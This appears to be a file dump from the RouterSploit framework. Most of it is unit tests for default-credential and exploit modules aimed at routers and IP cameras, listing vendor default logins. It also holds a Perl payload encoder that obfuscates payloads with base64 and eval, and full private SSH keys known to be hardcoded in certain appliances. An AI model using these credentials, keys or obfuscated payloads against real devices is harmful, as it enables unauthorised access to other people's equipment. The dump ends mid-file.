""" 6 | 7 | exploit = Exploit() 8 | 9 | assert exploit.target == "" 10 | assert exploit.port == 21 11 | assert exploit.threads == 1 12 | assert exploit.defaults == ["admin:admin"] 13 | assert exploit.stop_on_success is True 14 | assert exploit.verbosity is True 15 | 16 | exploit.target = generic_target.host 17 | exploit.port = generic_target.port 18 | 19 | assert exploit.check() is False 20 | assert exploit.check_default() is None 21 | assert exploit.run() is None 22 | -------------------------------------------------------------------------------- /tests/creds/routers/comtrend/test_ssh_default_creds.py: -------------------------------------------------------------------------------- 1 | from routersploit.modules.creds.routers.comtrend.ssh_default_creds import Exploit 2 | 3 | 4 | def test_check_success(generic_target): 5 | """ Test scenario - testing against SSH server """ 6 | 7 | exploit = Exploit() 8 | 9 | assert exploit.target == "" 10 | assert exploit.port == 22 11 | assert exploit.threads == 1 12 | assert exploit.defaults == ["admin:admin"] 13 | assert exploit.stop_on_success is True 14 | assert exploit.verbosity is True 15 | 16 | exploit.target = generic_target.host 17 | exploit.port = generic_target.port 18 | 19 | assert exploit.check() is False 20 | assert exploit.check_default() is None 21 | assert exploit.run() is None 22 | -------------------------------------------------------------------------------- /tests/creds/routers/mikrotik/test_ftp_default_creds.py: -------------------------------------------------------------------------------- 1 | from routersploit.modules.creds.routers.mikrotik.ftp_default_creds import Exploit 2 | 3 | 4 | def test_check_success(generic_target): 5 | """ Test scenario - testing against FTP server """ 6 | 7 | exploit = Exploit() 8 | 9 | assert exploit.target == "" 10 | assert exploit.port == 21 11 | assert exploit.threads == 1 12 | assert exploit.defaults == ["admin:admin"] 13 | assert exploit.stop_on_success is True 14 | assert exploit.verbosity is True 15 | 16 | exploit.target = generic_target.host 17 | exploit.port = generic_target.port 18 | 19 | assert exploit.check() is False 20 | assert exploit.check_default() is None 21 | assert exploit.run() is None 22 | -------------------------------------------------------------------------------- /tests/creds/routers/mikrotik/test_ssh_default_creds.py: -------------------------------------------------------------------------------- 1 | from routersploit.modules.creds.routers.mikrotik.ssh_default_creds import Exploit 2 | 3 | 4 | def test_check_success(generic_target): 5 | """ Test scenario - testing against SSH server """ 6 | 7 | exploit = Exploit() 8 | 9 | assert exploit.target == "" 10 | assert exploit.port == 22 11 | assert exploit.threads == 1 12 | assert exploit.defaults == ["admin:admin"] 13 | assert exploit.stop_on_success is True 14 | assert exploit.verbosity is True 15 | 16 | exploit.target = generic_target.host 17 | exploit.port = generic_target.port 18 | 19 | assert exploit.check() is False 20 | assert exploit.check_default() is None 21 | assert exploit.run() is None 22 | -------------------------------------------------------------------------------- /tests/creds/routers/pfsense/test_ssh_default_creds.py: -------------------------------------------------------------------------------- 1 | from routersploit.modules.creds.routers.pfsense.ssh_default_creds import Exploit 2 | 3 | 4 | def test_check_success(generic_target): 5 | """ Test scenario - testing against SSH server """ 6 | 7 | exploit = Exploit() 8 | 9 | assert exploit.target == "" 10 | assert exploit.port == 22 11 | assert exploit.threads == 1 12 | assert exploit.defaults == ["admin:pfsense"] 13 | assert exploit.stop_on_success is True 14 | assert exploit.verbosity is True 15 | 16 | exploit.target = generic_target.host 17 | exploit.port = generic_target.port 18 | 19 | assert exploit.check() is False 20 | assert exploit.check_default() is None 21 | assert exploit.run() is None 22 | -------------------------------------------------------------------------------- /tests/creds/cameras/arecont/test_telnet_default_creds.py: -------------------------------------------------------------------------------- 1 | from routersploit.modules.creds.cameras.arecont.telnet_default_creds import Exploit 2 | 3 | 4 | def test_check_success(generic_target): 5 | """ Test scenario - testing against Telnet server """ 6 | 7 | exploit = Exploit() 8 | assert exploit.target == "" 9 | assert exploit.port == 23 10 | assert exploit.threads == 1 11 | assert exploit.defaults == ["admin:", ":"] 12 | assert exploit.stop_on_success is True 13 | assert exploit.verbosity is True 14 | 15 | exploit.target = generic_target.host 16 | exploit.port = generic_target.port 17 | 18 | assert exploit.check() is True 19 | assert exploit.check_default() is not None 20 | assert exploit.run() is None 21 | -------------------------------------------------------------------------------- /tests/creds/cameras/brickcom/test_telnet_default_creds.py: -------------------------------------------------------------------------------- 1 | from routersploit.modules.creds.cameras.brickcom.telnet_default_creds import Exploit 2 | 3 | 4 | def test_check_success(generic_target): 5 | """ Test scenario - testing against Telnet server """ 6 | 7 | exploit = Exploit() 8 | assert exploit.target == "" 9 | assert exploit.port == 23 10 | assert exploit.threads == 1 11 | assert exploit.defaults == ["admin:admin"] 12 | assert exploit.stop_on_success is True 13 | assert exploit.verbosity is True 14 | 15 | exploit.target = generic_target.host 16 | exploit.port = generic_target.port 17 | 18 | assert exploit.check() is True 19 | assert exploit.check_default() is not None 20 | assert exploit.run() is None 21 | -------------------------------------------------------------------------------- /tests/creds/cameras/geovision/test_telnet_default_creds.py: -------------------------------------------------------------------------------- 1 | from routersploit.modules.creds.cameras.geovision.telnet_default_creds import Exploit 2 | 3 | 4 | def test_check_success(generic_target): 5 | """ Test scenario - testing against Telnet server """ 6 | 7 | exploit = Exploit() 8 | assert exploit.target == "" 9 | assert exploit.port == 23 10 | assert exploit.threads == 1 11 | assert exploit.defaults == ["admin:admin"] 12 | assert exploit.stop_on_success is True 13 | assert exploit.verbosity is True 14 | 15 | exploit.target = generic_target.host 16 | exploit.port = generic_target.port 17 | 18 | assert exploit.check() is True 19 | assert exploit.check_default() is not None 20 | assert exploit.run() is None 21 | -------------------------------------------------------------------------------- /tests/creds/cameras/hikvision/test_telnet_default_creds.py: -------------------------------------------------------------------------------- 1 | from routersploit.modules.creds.cameras.hikvision.telnet_default_creds import Exploit 2 | 3 | 4 | def test_check_success(generic_target): 5 | """ Test scenario - testing against Telnet server """ 6 | 7 | exploit = Exploit() 8 | assert exploit.target == "" 9 | assert exploit.port == 23 10 | assert exploit.threads == 1 11 | assert exploit.defaults == ["admin:12345"] 12 | assert exploit.stop_on_success is True 13 | assert exploit.verbosity is True 14 | 15 | exploit.target = generic_target.host 16 | exploit.port = generic_target.port 17 | 18 | assert exploit.check() is True 19 | assert exploit.check_default() is not None 20 | assert exploit.run() is None 21 | -------------------------------------------------------------------------------- /tests/creds/cameras/honeywell/test_telnet_default_creds.py: -------------------------------------------------------------------------------- 1 | from routersploit.modules.creds.cameras.honeywell.telnet_default_creds import Exploit 2 | 3 | 4 | def test_check_success(generic_target): 5 | """ Test scenario - testing against Telnet server """ 6 | 7 | exploit = Exploit() 8 | assert exploit.target == "" 9 | assert exploit.port == 23 10 | assert exploit.threads == 1 11 | assert exploit.defaults == ["admin:1234"] 12 | assert exploit.stop_on_success is True 13 | assert exploit.verbosity is True 14 | 15 | exploit.target = generic_target.host 16 | exploit.port = generic_target.port 17 | 18 | assert exploit.check() is True 19 | assert exploit.check_default() is not None 20 | assert exploit.run() is None 21 | -------------------------------------------------------------------------------- /tests/creds/cameras/mobotix/test_telnet_default_creds.py: -------------------------------------------------------------------------------- 1 | from routersploit.modules.creds.cameras.mobotix.telnet_default_creds import Exploit 2 | 3 | 4 | def test_check_success(generic_target): 5 | """ Test scenario - testing against Telnet server """ 6 | 7 | exploit = Exploit() 8 | assert exploit.target == "" 9 | assert exploit.port == 23 10 | assert exploit.threads == 1 11 | assert exploit.defaults == ["admin:meinsm"] 12 | assert exploit.stop_on_success is True 13 | assert exploit.verbosity is True 14 | 15 | exploit.target = generic_target.host 16 | exploit.port = generic_target.port 17 | 18 | assert exploit.check() is True 19 | assert exploit.check_default() is not None 20 | assert exploit.run() is None 21 | -------------------------------------------------------------------------------- /tests/creds/cameras/sentry360/test_telnet_default_creds.py: -------------------------------------------------------------------------------- 1 | from routersploit.modules.creds.cameras.sentry360.telnet_default_creds import Exploit 2 | 3 | 4 | def test_check_success(generic_target): 5 | """ Test scenario - testing against Telnet server """ 6 | 7 | exploit = Exploit() 8 | assert exploit.target == "" 9 | assert exploit.port == 23 10 | assert exploit.threads == 1 11 | assert exploit.defaults == ["admin:1234"] 12 | assert exploit.stop_on_success is True 13 | assert exploit.verbosity is True 14 | 15 | exploit.target = generic_target.host 16 | exploit.port = generic_target.port 17 | 18 | assert exploit.check() is True 19 | assert exploit.check_default() is not None 20 | assert exploit.run() is None 21 | -------------------------------------------------------------------------------- /tests/creds/cameras/siemens/test_telnet_default_creds.py: -------------------------------------------------------------------------------- 1 | from routersploit.modules.creds.cameras.siemens.telnet_default_creds import Exploit 2 | 3 | 4 | def test_check_success(generic_target): 5 | """ Test scenario - testing against Telnet server """ 6 | 7 | exploit = Exploit() 8 | assert exploit.target == "" 9 | assert exploit.port == 23 10 | assert exploit.threads == 1 11 | assert exploit.defaults == ["admin:admin"] 12 | assert exploit.stop_on_success is True 13 | assert exploit.verbosity is True 14 | 15 | exploit.target = generic_target.host 16 | exploit.port = generic_target.port 17 | 18 | assert exploit.check() is True 19 | assert exploit.check_default() is not None 20 | assert exploit.run() is None 21 | -------------------------------------------------------------------------------- /tests/creds/cameras/stardot/test_telnet_default_creds.py: -------------------------------------------------------------------------------- 1 | from routersploit.modules.creds.cameras.stardot.telnet_default_creds import Exploit 2 | 3 | 4 | def test_check_success(generic_target): 5 | """ Test scenario - testing against Telnet server """ 6 | 7 | exploit = Exploit() 8 | assert exploit.target == "" 9 | assert exploit.port == 23 10 | assert exploit.threads == 1 11 | assert exploit.defaults == ["admin:admin"] 12 | assert exploit.stop_on_success is True 13 | assert exploit.verbosity is True 14 | 15 | exploit.target = generic_target.host 16 | exploit.port = generic_target.port 17 | 18 | assert exploit.check() is True 19 | assert exploit.check_default() is not None 20 | assert exploit.run() is None 21 | -------------------------------------------------------------------------------- /tests/creds/routers/cisco/test_telnet_default_creds.py: -------------------------------------------------------------------------------- 1 | from routersploit.modules.creds.routers.cisco.telnet_default_creds import Exploit 2 | 3 | 4 | def test_check_success(generic_target): 5 | """ Test scenario - testing against Telnet server """ 6 | 7 | exploit = Exploit() 8 | 9 | assert exploit.target == "" 10 | assert exploit.port == 23 11 | assert exploit.threads == 1 12 | assert exploit.defaults == ["admin:admin"] 13 | assert exploit.stop_on_success is True 14 | assert exploit.verbosity is True 15 | 16 | exploit.target = generic_target.host 17 | exploit.port = generic_target.port 18 | 19 | assert exploit.check() is True 20 | assert exploit.check_default() is not None 21 | assert exploit.run() is None 22 | -------------------------------------------------------------------------------- /tests/creds/routers/netsys/test_telnet_default_creds.py: -------------------------------------------------------------------------------- 1 | from routersploit.modules.creds.routers.netsys.telnet_default_creds import Exploit 2 | 3 | 4 | def test_check_success(generic_target): 5 | """ Test scenario - testing against Telnet server """ 6 | 7 | exploit = Exploit() 8 | 9 | assert exploit.target == "" 10 | assert exploit.port == 23 11 | assert exploit.threads == 1 12 | assert exploit.defaults == ["admin:admin"] 13 | assert exploit.stop_on_success is True 14 | assert exploit.verbosity is True 15 | 16 | exploit.target = generic_target.host 17 | exploit.port = generic_target.port 18 | 19 | assert exploit.check() is True 20 | assert exploit.check_default() is not None 21 | assert exploit.run() is None 22 | -------------------------------------------------------------------------------- /tests/creds/routers/tplink/test_telnet_default_creds.py: -------------------------------------------------------------------------------- 1 | from routersploit.modules.creds.routers.tplink.telnet_default_creds import Exploit 2 | 3 | 4 | def test_check_success(generic_target): 5 | """ Test scenario - testing against Telnet server """ 6 | 7 | exploit = Exploit() 8 | 9 | assert exploit.target == "" 10 | assert exploit.port == 23 11 | assert exploit.threads == 1 12 | assert exploit.defaults == ["admin:admin"] 13 | assert exploit.stop_on_success is True 14 | assert exploit.verbosity is True 15 | 16 | exploit.target = generic_target.host 17 | exploit.port = generic_target.port 18 | 19 | assert exploit.check() is True 20 | assert exploit.check_default() is not None 21 | assert exploit.run() is None 22 | -------------------------------------------------------------------------------- /tests/exploits/routers/dlink/test_dir_300_320_600_615_info_disclosure.py: -------------------------------------------------------------------------------- 1 | from routersploit.modules.exploits.routers.dlink.dir_300_320_600_615_info_disclosure import Exploit 2 | 3 | 4 | def test_exploit_success(target): 5 | """ Test scenario - successful exploitation """ 6 | 7 | route_mock = target.get_route_mock("/model/__show_info.php", methods=["GET"]) 8 | route_mock.return_value = ( 9 | "test" 10 | "\n\t\t\tadmin:Password1234\n\n\t\t\t" 11 | "test" 12 | ) 13 | 14 | exploit = Exploit() 15 | 16 | assert exploit.target == "" 17 | assert exploit.port == 80 18 | 19 | exploit.target = target.host 20 | exploit.port = target.port 21 | 22 | assert exploit.check() 23 | assert exploit.run() is None 24 | -------------------------------------------------------------------------------- /tests/exploits/routers/dlink/test_dsl_2730b_2780b_526b_dns_change.py: -------------------------------------------------------------------------------- 1 | from routersploit.modules.exploits.routers.dlink.dsl_2730b_2780b_526b_dns_change import Exploit 2 | 3 | 4 | def test_check_success(target): 5 | """ Test scenario - successful exploitation """ 6 | 7 | route_mock = target.get_route_mock("/dnscfg.cgi", methods=["POST"]) 8 | route_mock.return_value = ( 9 | "TEST" 10 | ) 11 | 12 | exploit = Exploit() 13 | 14 | assert exploit.target == "" 15 | assert exploit.port == 80 16 | assert exploit.dns1 == "8.8.8.8" 17 | assert exploit.dns2 == "8.8.4.4" 18 | 19 | exploit.target = target.host 20 | exploit.port = target.port 21 | 22 | assert exploit.check() is None 23 | assert exploit.run() is None 24 | -------------------------------------------------------------------------------- /tests/exploits/routers/dlink/test_dwr_932b_backdoor.py: -------------------------------------------------------------------------------- 1 | from unittest import mock 2 | from routersploit.modules.exploits.routers.dlink.dwr_932b_backdoor import Exploit 3 | 4 | 5 | @mock.patch("routersploit.modules.exploits.routers.dlink.dwr_932b_backdoor.shell") 6 | def test_check_success(mocked_shell, udp_target): 7 | """ Test scenario - successful check """ 8 | 9 | command_mock = udp_target.get_command_mock(b"HELODBG") 10 | command_mock.return_value = b"TEST Hello TEST" 11 | 12 | exploit = Exploit() 13 | 14 | assert exploit.target == "" 15 | assert exploit.port == 39889 16 | 17 | exploit.target = udp_target.host 18 | exploit.port = udp_target.port 19 | 20 | assert exploit.check() 21 | assert exploit.run() is None 22 | -------------------------------------------------------------------------------- /routersploit/modules/encoders/perl/base64.py: -------------------------------------------------------------------------------- 1 | from base64 import b64encode 2 | from routersploit.core.exploit.encoders import BaseEncoder 3 | from routersploit.core.exploit.payloads import Architectures 4 | 5 | 6 | class Encoder(BaseEncoder): 7 | __info__ = { 8 | "name": "Perl Base64 Encoder", 9 | "description": "Module encodes PERL payload to Base64 format.", 10 | "authors": ( 11 | "Marcin Bury ", # routersploit module 12 | ), 13 | } 14 | 15 | architecture = Architectures.PERL 16 | 17 | def encode(self, payload): 18 | encoded_payload = str(b64encode(bytes(payload, "utf-8")), "utf-8") 19 | return "use MIME::Base64;eval(decode_base64('{}'));".format(encoded_payload) 20 | -------------------------------------------------------------------------------- /routersploit/resources/ssh_keys/array-networks-vapv-vxag.key: -------------------------------------------------------------------------------- 1 | -----BEGIN DSA PRIVATE KEY----- 2 | MIIBugIBAAKBgQCUw7F/vKJT2Xsq+fIPVxNC/Dyk+dN9DWQT5RO56eIQasd+h6Fm 3 | q1qtQrJ/DOe3VjfUrSm7NN5NoIGOrGCSuQFthFmq+9Lpt6WIykB4mau5iE5orbKM 4 | xTfyu8LtntoikYKrlMB+UrmKDidvZ+7oWiC14imT+Px/3Q7naj0UmOrSTwIVAO25 5 | Yf3SYNtTYv8yzaV+X9yNr/AfAoGADAcEh2bdsrDhwhXtVi1L3cFQx1KpN0B07JLr 6 | gJzJcDLUrwmlMUmrXR2obDGfVQh46EFMeo/k3IESw2zJUS58FJW+sKZ4noSwRZPq 7 | mpBnERKpLOTcWMxUyV8ETsz+9oz71YEMjmR1qvNYAopXf5Yy+4Zq3bgqmMMQyM+K 8 | O1PdlCkCgYBmhSl9CVPgVMv1xO8DAHVhM1huIIK8mNFrzMJz+JXzBx81ms1kWSeQ 9 | OC/nraaXFTBlqiQsvB8tzr4xZdbaI/QzVLKNAF5C8BJ4ScNlTIx1aZJwyMil8Nzb 10 | +0YAsw5Ja+bEZZvEVlAYnd10qRWrPeEY1txLMmX3wDa+JvJL7fmuBgIUZoXsJnzs 11 | +sqSEhA35Le2kC4Y1/A= 12 | -----END DSA PRIVATE KEY----- 13 | -------------------------------------------------------------------------------- /routersploit/resources/ssh_keys/barracuda_load_balancer_vm.key: -------------------------------------------------------------------------------- 1 | -----BEGIN DSA PRIVATE KEY----- 2 | MIIBuwIBAAKBgQDKuRHCBXXwoyWpMkJz/wQafaHOpqWmVYLn9GZ6eQuNLcIhtZQE 3 | kCWZTNajgf4ZAVmHgQh1JHDixJ1V0mcweti/lvyxiqHap7IkD0a+ewAOoz3OpjQZ 4 | 3ox2ovHEnQJfZ/9LNiEI3XK8TPAj6trhMn5tCdwFei6228a+TYBOccTPgwIVAKYW 5 | T8ztHHaN7Gwn0I6keQfBSNw1AoGAHYNfKAcqf7Y4wyoVoZpr/h21SETpEaksQb7h 6 | GRJnFpYN/JiyE9W8nX6UqLv1eKyOXLccAnyda0a+uqcOhsAq8+H15slZYa4+065L 7 | ckPfs0V4cpxeMHTT1hK4TR2/LRpUjhYjgXFE5aLl91f5Gug5HemUK2S0BWh/oI38 8 | k2WfNh0CgYEArsJgp7RLPOsCeLqoia/eljseBFVDazO5Q0ysUotTw9wgXGGVWREw 9 | m8wNggFNb9eCiBAAUfVZVfhVAtFT0pBf/eIVLPXyaMw3prBt7LqeBrbagODc3WAA 10 | dMTPIdYYcOKgv+YvTXa51zG64v6pQOfS8WXgKCzDl44puXfYeDk5lVQCFAPfgalL 11 | +FT93tofXMuNVfeQMLJl 12 | -----END DSA PRIVATE KEY----- 13 | -------------------------------------------------------------------------------- /routersploit/resources/ssh_keys/monroe-dasdec-cve-2013-0137.key: -------------------------------------------------------------------------------- 1 | -----BEGIN DSA PRIVATE KEY----- 2 | MIIBuwIBAAKBgQDdwCE68iTEMjimYwJMvpkP/KThyJbuKvKc5kdKqLSmi5tssnuW 3 | tD2NqzmkEQM4uxD4XgV26k2/GvE6x4RlyOT+xlB2iYaOR4RJ8PuU8ALz+9i+y3D8 4 | MTMY/6y3Ef41frizLFXiVVo8CXFL/N8sz16FYytIayJvkSy3rkzPoE8pRwIVAPmA 5 | F1excCJPPVq3MyDfEMUXXOWjAoGAJS8ukwjJTgTNCHD7Lz//WxIw49DPGGWs3are 6 | GpjtiGjVD2Lff7CLCzkH8SI/JsgytUzqfDckSXqe1eWiAhuH90Pl5LZZi83Vp97I 7 | 721riAF3taKYxtk+vWIcXx2a/Fp+z+LaQoMqjOLh5lCq35wc0EPb5FFFrGaFFzNm 8 | e71F1X0CgYAU6eNlphQWDwx0KOBiiYhF9BM6kDbQlyw8333rAG3G4CcjI2G8eYGt 9 | pBNliaD185UjCEsjPiudhGil/j4Zt/+VY3aGOLoi8kqXBBc8ZAML9bbkXpyhQhMg 10 | wiywx3ciFmvSn2UAin8yurStYPQxtXauZN5PYbdwCHPS7ApIStdpMAIVAJ+eePIA 11 | Azb0ux287wRfcfdbjlDM 12 | -----END DSA PRIVATE KEY----- 13 | -------------------------------------------------------------------------------- /tests/creds/cameras/avigilon/test_ftp_default_creds.py: -------------------------------------------------------------------------------- 1 | from routersploit.modules.creds.cameras.avigilon.ftp_default_creds import Exploit 2 | 3 | 4 | def test_check_success(generic_target): 5 | """ Test scenario - testing against FTP server """ 6 | 7 | exploit = Exploit() 8 | assert exploit.target == "" 9 | assert exploit.port == 21 10 | assert exploit.threads == 1 11 | assert exploit.defaults == ["admin:admin", "Administrator:"] 12 | assert exploit.stop_on_success is True 13 | assert exploit.verbosity is True 14 | 15 | exploit.target = generic_target.host 16 | exploit.port = generic_target.port 17 | 18 | assert exploit.check() is False 19 | assert exploit.check_default() is None 20 | assert exploit.run() is None 21 | -------------------------------------------------------------------------------- /tests/creds/cameras/axis/test_telnet_default_creds.py: -------------------------------------------------------------------------------- 1 | from routersploit.modules.creds.cameras.axis.telnet_default_creds import Exploit 2 | 3 | 4 | def test_check_success(generic_target): 5 | """ Test scenario - testing against Telnet server """ 6 | 7 | exploit = Exploit() 8 | assert exploit.target == "" 9 | assert exploit.port == 23 10 | assert exploit.threads == 1 11 | assert exploit.defaults == ["root:pass", "admin:admin"] 12 | assert exploit.stop_on_success is True 13 | assert exploit.verbosity is True 14 | 15 | exploit.target = generic_target.host 16 | exploit.port = generic_target.port 17 | 18 | assert exploit.check() is True 19 | assert exploit.check_default() is not None 20 | assert exploit.run() is None 21 | -------------------------------------------------------------------------------- /tests/creds/cameras/grandstream/test_telnet_default_creds.py: -------------------------------------------------------------------------------- 1 | from routersploit.modules.creds.cameras.grandstream.telnet_default_creds import Exploit 2 | 3 | 4 | def test_check_success(generic_target): 5 | """ Test scenario - testing against Telnet server """ 6 | 7 | exploit = Exploit() 8 | assert exploit.target == "" 9 | assert exploit.port == 23 10 | assert exploit.threads == 1 11 | assert exploit.defaults == ["admin:admin"] 12 | assert exploit.stop_on_success is True 13 | assert exploit.verbosity is True 14 | 15 | exploit.target = generic_target.host 16 | exploit.port = generic_target.port 17 | 18 | assert exploit.check() is True 19 | assert exploit.check_default() is not None 20 | assert exploit.run() is None 21 | -------------------------------------------------------------------------------- /tests/creds/cameras/iqinvision/test_telnet_default_creds.py: -------------------------------------------------------------------------------- 1 | from routersploit.modules.creds.cameras.iqinvision.telnet_default_creds import Exploit 2 | 3 | 4 | def test_check_success(generic_target): 5 | """ Test scenario - testing against Telnet server """ 6 | 7 | exploit = Exploit() 8 | assert exploit.target == "" 9 | assert exploit.port == 23 10 | assert exploit.threads == 1 11 | assert exploit.defaults == ["root:system"] 12 | assert exploit.stop_on_success is True 13 | assert exploit.verbosity is True 14 | 15 | exploit.target = generic_target.host 16 | exploit.port = generic_target.port 17 | 18 | assert exploit.check() is True 19 | assert exploit.check_default() is not None 20 | assert exploit.run() is None 21 | -------------------------------------------------------------------------------- /tests/creds/routers/billion/test_telnet_default_creds.py: -------------------------------------------------------------------------------- 1 | from routersploit.modules.creds.routers.billion.telnet_default_creds import Exploit 2 | 3 | 4 | def test_check_success(generic_target): 5 | """ Test scenario - testing against Telnet server """ 6 | 7 | exploit = Exploit() 8 | 9 | assert exploit.target == "" 10 | assert exploit.port == 23 11 | assert exploit.threads == 1 12 | assert exploit.defaults == ["admin:admin"] 13 | assert exploit.stop_on_success is True 14 | assert exploit.verbosity is True 15 | 16 | exploit.target = generic_target.host 17 | exploit.port = generic_target.port 18 | 19 | assert exploit.check() is True 20 | assert exploit.check_default() is not None 21 | assert exploit.run() is None 22 | -------------------------------------------------------------------------------- /tests/creds/routers/comtrend/test_telnet_default_creds.py: -------------------------------------------------------------------------------- 1 | from routersploit.modules.creds.routers.comtrend.telnet_default_creds import Exploit 2 | 3 | 4 | def test_check_success(generic_target): 5 | """ Test scenario - testing against Telnet server """ 6 | 7 | exploit = Exploit() 8 | 9 | assert exploit.target == "" 10 | assert exploit.port == 23 11 | assert exploit.threads == 1 12 | assert exploit.defaults == ["admin:admin"] 13 | assert exploit.stop_on_success is True 14 | assert exploit.verbosity is True 15 | 16 | exploit.target = generic_target.host 17 | exploit.port = generic_target.port 18 | 19 | assert exploit.check() is True 20 | assert exploit.check_default() is not None 21 | assert exploit.run() is None 22 | -------------------------------------------------------------------------------- /tests/creds/routers/mikrotik/test_telnet_default_creds.py: -------------------------------------------------------------------------------- 1 | from routersploit.modules.creds.routers.mikrotik.telnet_default_creds import Exploit 2 | 3 | 4 | def test_check_success(generic_target): 5 | """ Test scenario - testing against Telnet server """ 6 | 7 | exploit = Exploit() 8 | 9 | assert exploit.target == "" 10 | assert exploit.port == 23 11 | assert exploit.threads == 1 12 | assert exploit.defaults == ["admin:admin"] 13 | assert exploit.stop_on_success is True 14 | assert exploit.verbosity is True 15 | 16 | exploit.target = generic_target.host 17 | exploit.port = generic_target.port 18 | 19 | assert exploit.check() is True 20 | assert exploit.check_default() is not None 21 | assert exploit.run() is None 22 | -------------------------------------------------------------------------------- /tests/creds/routers/movistar/test_ftp_default_creds.py: -------------------------------------------------------------------------------- 1 | from routersploit.modules.creds.routers.movistar.ftp_default_creds import Exploit 2 | 3 | 4 | def test_check_success(generic_target): 5 | """ Test scenario - testing against FTP server """ 6 | 7 | exploit = Exploit() 8 | 9 | assert exploit.target == "" 10 | assert exploit.port == 21 11 | assert exploit.threads == 1 12 | assert exploit.defaults == ["admin:admin", "1234:1234"] 13 | assert exploit.stop_on_success is True 14 | assert exploit.verbosity is True 15 | 16 | exploit.target = generic_target.host 17 | exploit.port = generic_target.port 18 | 19 | assert exploit.check() is False 20 | assert exploit.check_default() is None 21 | assert exploit.run() is None 22 | -------------------------------------------------------------------------------- /tests/creds/routers/movistar/test_ssh_default_creds.py: -------------------------------------------------------------------------------- 1 | from routersploit.modules.creds.routers.movistar.ssh_default_creds import Exploit 2 | 3 | 4 | def test_check_success(generic_target): 5 | """ Test scenario - testing against SSH server """ 6 | 7 | exploit = Exploit() 8 | 9 | assert exploit.target == "" 10 | assert exploit.port == 22 11 | assert exploit.threads == 1 12 | assert exploit.defaults == ["admin:admin", "1234:1234"] 13 | assert exploit.stop_on_success is True 14 | assert exploit.verbosity is True 15 | 16 | exploit.target = generic_target.host 17 | exploit.port = generic_target.port 18 | 19 | assert exploit.check() is False 20 | assert exploit.check_default() is None 21 | assert exploit.run() is None 22 | -------------------------------------------------------------------------------- /tests/creds/routers/netcore/test_ftp_default_creds.py: -------------------------------------------------------------------------------- 1 | from routersploit.modules.creds.routers.netcore.ftp_default_creds import Exploit 2 | 3 | 4 | def test_check_success(generic_target): 5 | """ Test scenario - testing against FTP server """ 6 | 7 | exploit = Exploit() 8 | 9 | assert exploit.target == "" 10 | assert exploit.port == 21 11 | assert exploit.threads == 1 12 | assert exploit.defaults == ["admin:admin", "guest:guest"] 13 | assert exploit.stop_on_success is True 14 | assert exploit.verbosity is True 15 | 16 | exploit.target = generic_target.host 17 | exploit.port = generic_target.port 18 | 19 | assert exploit.check() is False 20 | assert exploit.check_default() is None 21 | assert exploit.run() is None 22 | -------------------------------------------------------------------------------- /tests/creds/routers/netcore/test_ssh_default_creds.py: -------------------------------------------------------------------------------- 1 | from routersploit.modules.creds.routers.netcore.ssh_default_creds import Exploit 2 | 3 | 4 | def test_check_success(generic_target): 5 | """ Test scenario - testing against SSH server """ 6 | 7 | exploit = Exploit() 8 | 9 | assert exploit.target == "" 10 | assert exploit.port == 22 11 | assert exploit.threads == 1 12 | assert exploit.defaults == ["admin:admin", "guest:guest"] 13 | assert exploit.stop_on_success is True 14 | assert exploit.verbosity is True 15 | 16 | exploit.target = generic_target.host 17 | exploit.port = generic_target.port 18 | 19 | assert exploit.check() is False 20 | assert exploit.check_default() is None 21 | assert exploit.run() is None 22 | -------------------------------------------------------------------------------- /routersploit/resources/ssh_keys/loadbalancer.org-enterprise-va.key: -------------------------------------------------------------------------------- 1 | -----BEGIN DSA PRIVATE KEY----- 2 | MIIBugIBAAKBgQCsCgcOw+DgNR/7g+IbXYdOEwSB3W0o3l1Ep1ibHHvAtLb6AdNW 3 | Gq47/UxY/rX3g2FVrVCtQwNSZMqkrqALQwDScxeCOiLMndCj61t3RxU3IOl5c/Hd 4 | yhGh6JGPdzTpgf8VhJIZnvG+0NFNomYntqYFm0y11dBQPpYbJE7Tx1t/lQIVANHJ 5 | rJSVVkpcTB4XdtR7TfO317xVAoGABDytZN2OhKwGyJfenZ1Ap2Y7lkO8V8tOtqX+ 6 | t0LkViOi2ErHJt39aRJJ1lDRa/3q0NNqZH4tnj/bh5dUyNapflJiV94N3637LCzW 7 | cFlwFtJvD22Nx2UrPn+YXrzN7mt9qZyg5m0NlqbyjcsnCh4vNYUiNeMTHHW5SaJY 8 | TeYmPP8CgYAjEe5+0m/TlBtVkqQbUit+s/g+eB+PFQ+raaQdL1uztW3etntXAPH1 9 | MjxsAC/vthWYSTYXORkDFMhrO5ssE2rfg9io0NDyTIZt+VRQMGdi++dH8ptU+ldl 10 | 2ZejLFdTJFwFgcfXz+iQ1mx6h9TPX1crE1KoMAVOj3yKVfKpLB1EkAIUCsG3dIJH 11 | SzmJVCWFyVuuANR2Bnc= 12 | -----END DSA PRIVATE KEY----- 13 | -------------------------------------------------------------------------------- /tests/creds/cameras/acti/test_ssh_default_creds.py: -------------------------------------------------------------------------------- 1 | from routersploit.modules.creds.cameras.acti.ssh_default_creds import Exploit 2 | 3 | 4 | def test_check_success(target): 5 | """ Test scenario - testing against SSH server """ 6 | 7 | exploit = Exploit() 8 | 9 | assert exploit.target == "" 10 | assert exploit.port == 22 11 | assert exploit.threads == 1 12 | assert exploit.defaults == ["admin:12345", "admin:123456", "Admin:12345", "Admin:123456"] 13 | assert exploit.stop_on_success is True 14 | assert exploit.verbosity is True 15 | 16 | exploit.target = target.host 17 | exploit.port = target.port 18 | 19 | assert exploit.check() is False 20 | assert exploit.check_default() is None 21 | assert exploit.run() is None 22 | -------------------------------------------------------------------------------- /tests/creds/cameras/videoiq/test_telnet_default_creds.py: -------------------------------------------------------------------------------- 1 | from routersploit.modules.creds.cameras.videoiq.telnet_default_creds import Exploit 2 | 3 | 4 | def test_check_success(generic_target): 5 | """ Test scenario - testing against Telnet server """ 6 | 7 | exploit = Exploit() 8 | assert exploit.target == "" 9 | assert exploit.port == 23 10 | assert exploit.threads == 1 11 | assert exploit.defaults == ["supervisor:supervisor"] 12 | assert exploit.stop_on_success is True 13 | assert exploit.verbosity is True 14 | 15 | exploit.target = generic_target.host 16 | exploit.port = generic_target.port 17 | 18 | assert exploit.check() is True 19 | assert exploit.check_default() is not None 20 | assert exploit.run() is None 21 | -------------------------------------------------------------------------------- /tests/creds/routers/belkin/test_ftp_default_creds.py: -------------------------------------------------------------------------------- 1 | from routersploit.modules.creds.routers.belkin.ftp_default_creds import Exploit 2 | 3 | 4 | def test_check_success(generic_target): 5 | """ Test scenario - testing against FTP server """ 6 | 7 | exploit = Exploit() 8 | 9 | assert exploit.target == "" 10 | assert exploit.port == 21 11 | assert exploit.threads == 1 12 | assert exploit.defaults == 